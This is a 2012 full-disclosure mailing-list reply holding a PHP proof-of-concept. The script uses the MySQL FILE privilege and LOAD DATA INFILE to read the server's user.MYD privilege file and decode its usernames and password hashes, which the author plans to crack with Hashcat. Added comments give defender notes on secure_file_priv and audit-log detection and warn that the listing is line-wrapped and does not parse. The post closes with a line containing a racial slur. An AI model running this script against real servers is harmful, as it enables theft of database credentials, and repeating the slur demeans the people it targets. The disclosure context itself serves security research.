Re: [Full-disclosure] MySQL (Linux) Database Privilege Elevation Zeroday Exploit
- To: <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: Re: [Full-disclosure] MySQL (Linux) Database Privilege Elevation Zeroday Exploit
- From: kai@xxxxxxxxx
- Date: Tue, 04 Dec 2012 07:25:32 +0700
Hi all,
wrote some shitcode for MySQL user & hash enumeration for when you have the FILE
privilege. Surely you could do it with a simple bash one-liner using
mysql+grep+sed, but we're not going the easy way, right?
the first thought was "hey, what about changing the root password directly
in the user.MYD file?" but then...
file_name cannot be an existing file, which among other things
prevents files such as /etc/passwd and database tables from being
destroyed.
anyway we have Nvidia cards and Hashcat.
Cheers,
Kai
<?php
# (The original header comment here was mis-encoded non-ASCII text and could not be recovered.)
#
# Proof-of-concept as posted to full-disclosure. The only precondition it
# relies on is the global FILE privilege on an account that otherwise cannot
# read the `mysql` schema (the script deliberately aborts with die(11) if it
# can). It asks the server, via LOAD DATA INFILE, to read the privilege
# table's data file ($file) into a throw-away LONGBLOB table in the user's
# own database, then prints the bytes as text.
#
# Defender notes:
#  - Do not grant FILE to application accounts; restricting server-side file
#    reads with secure_file_priv removes the precondition entirely. OS
#    permissions on the data directory do not help here, because the read is
#    performed by the mysqld process itself, not by this client.
#  - Detection: LOAD DATA INFILE statements naming a path under the server
#    data directory, and CREATE/DROP TABLE of a single-LONGBLOB table by a
#    non-administrative account, in the general/audit log.
#  - The script uses the legacy mysql_* extension (removed in PHP 7.0), a
#    hard-coded data-file path, and hard-coded credentials. This listing is
#    also line-wrapped by the mail client: several comments and string
#    literals continue on the following line, so it does not parse as posted.
$host="localhost";
$port="3306";
$db="loltest"; # db for loading file contents. $user must have privileges to
write in it:
## Setup the author used for testing (sample account; the password below is
## that example value, not a secret worth protecting):
## mysql -u root -p
## create database loltest;
## create user "loltest"@"localhost" identified by "asdasdasdasd";
## grant all privileges on loltest.* to "loltest"@"localhost";
## grant FILE on *.* to "loltest"@"localhost";
## flush privileges;
$user="loltest"; # user with FILE privilege
$pass="asdasdasdasd";
$file="/var/lib/mysql/mysql/user.MYD"; # change to correct path if it differs
echo "-> connecting.. ";
# Legacy mysql_connect(): host and port are passed as one "host:port" string.
$link=mysql_connect("".$host.":".$port."",$user,$pass) or die("cant connect:
".mysql_error()."\n");
echo "OK\n-> trying to select `mysql` db.. ";
# Sanity check: the script only proceeds when the account CANNOT select the
# `mysql` schema; if it can, the data is readable directly and the script exits.
$rez=mysql_select_db("mysql");
if (!$rez) {
echo "OK, \$user $user has no access to `mysql`, proceeding..\n";
} else {
echo "\$user $user has access to `mysql`!\n"; # so why do you need this
"exploit"?
die(11);
}
echo "-> selecting db.. ";
mysql_select_db($db) or die ("cannot select db: ".mysql_error()."\n");
echo "OK\n-> trying to drop old table.. ";
# Best-effort cleanup of a previous run; failure is reported but not fatal.
$rez=mysql_query("DROP TABLE file;");
if (!$rez) { echo "cannot drop table: ".mysql_error()."\n"; }
echo "OK\n-> creating table.. ";
mysql_query("CREATE TABLE `file` ( `text` LONGBLOB NOT NULL );") or die
("cannot create table: ".mysql_error()."\n");
echo "OK\n-> reading file $file.. ";
# Server-side read: the mysqld process opens $file (this is what FILE grants).
# The empty LINES TERMINATED BY string is the author's way of loading the
# whole file; $file is interpolated unescaped into the statement.
mysql_query('LOAD DATA INFILE "'.$file.'" INTO TABLE file LINES TERMINATED BY
"" (`text`);') or die ("cannot load data: ".mysql_error()."\n");
$rez=mysql_query("SELECT * FROM file;");
if (!$rez) { echo "fail. no FILE permission?\n"; }
else {
# $name is assigned per field but never read afterwards (dead code).
for ($i=0;$i<mysql_num_fields($rez);$i++) {$name = mysql_field_name($rez,$i);}
$data="";
# Concatenate every row's columns, CRLF-separated, into one byte string.
while ($row = mysql_fetch_array($rez, MYSQL_ASSOC)) {$data .= join
("\r\n",$row);}
if (empty($data)) {
echo "file does not exists or empty?\n";
} else {
echo "OK\n-> result:\n";
# $hex becomes a space-separated uppercase hex dump of $data ("FB 0F ...").
# NOTE(review): $hex is only defined on this branch but is used
# unconditionally below; an empty $data leaves it undefined there.
$hex = "";
$plain = "";
for ($i=0; $i<strlen($data); $i++) {
$hex .= sprintf("%02X",ord($data[$i]))." ";
}
}
mysql_free_result($rez);
# Remove the staging table again; here the failure IS fatal.
mysql_query("DROP TABLE file;") or die("cannot drop table:
".mysql_error()."\n");
}
#echo " ------------- hex -------------\n".$hex."\n"; #debug
# Reset: $plain was a string above, here it becomes the list of decoded rows.
$plain=array();
# The byte pattern below is the author's own guess at the MyISAM row delimiter
# (note the "(?)"); it is not a documented record format and may not match
# other server versions or row layouts.
preg_match_all("/FB 0F F. (.*?) 0(1|2) /s", $hex, $onlygood); # FB 0F F. =
mysql row delimiter (?)
foreach ($onlygood[1] as $string) {
$temp="";
$charz=explode(" ",$string);
# Render each hex byte: 01 and 1A are dropped, 03..0F are treated as field
# separators and printed as a space, 2A is printed as " *", everything else
# is emitted verbatim via chr().
foreach ($charz as $char) {
switch ($char) {
case "01": $temp .= ""; break;
case "03": $temp .= " "; break;
case "04": $temp .= " "; break;
case "05": $temp .= " "; break;
case "06": $temp .= " "; break;
case "07": $temp .= " "; break;
case "08": $temp .= " "; break;
case "09": $temp .= " "; break;
case "0A": $temp .= " "; break;
case "0B": $temp .= " "; break;
case "0C": $temp .= " "; break;
case "0D": $temp .= " "; break;
case "0E": $temp .= " "; break;
case "0F": $temp .= " "; break;
case "1A": $temp .= ""; break;
case "2A": $temp .= " *"; break;
default: $temp .= chr(hexdec($char));
}
}
$plain[]=$temp;
}
echo " ------------- plain users -------------\n";
foreach ($plain as $lol) {
echo $lol."\n";
}
mysql_close($link);
echo "\nbl1ng bl1ng n1gg4 :PppPpPPpPPPpP\n";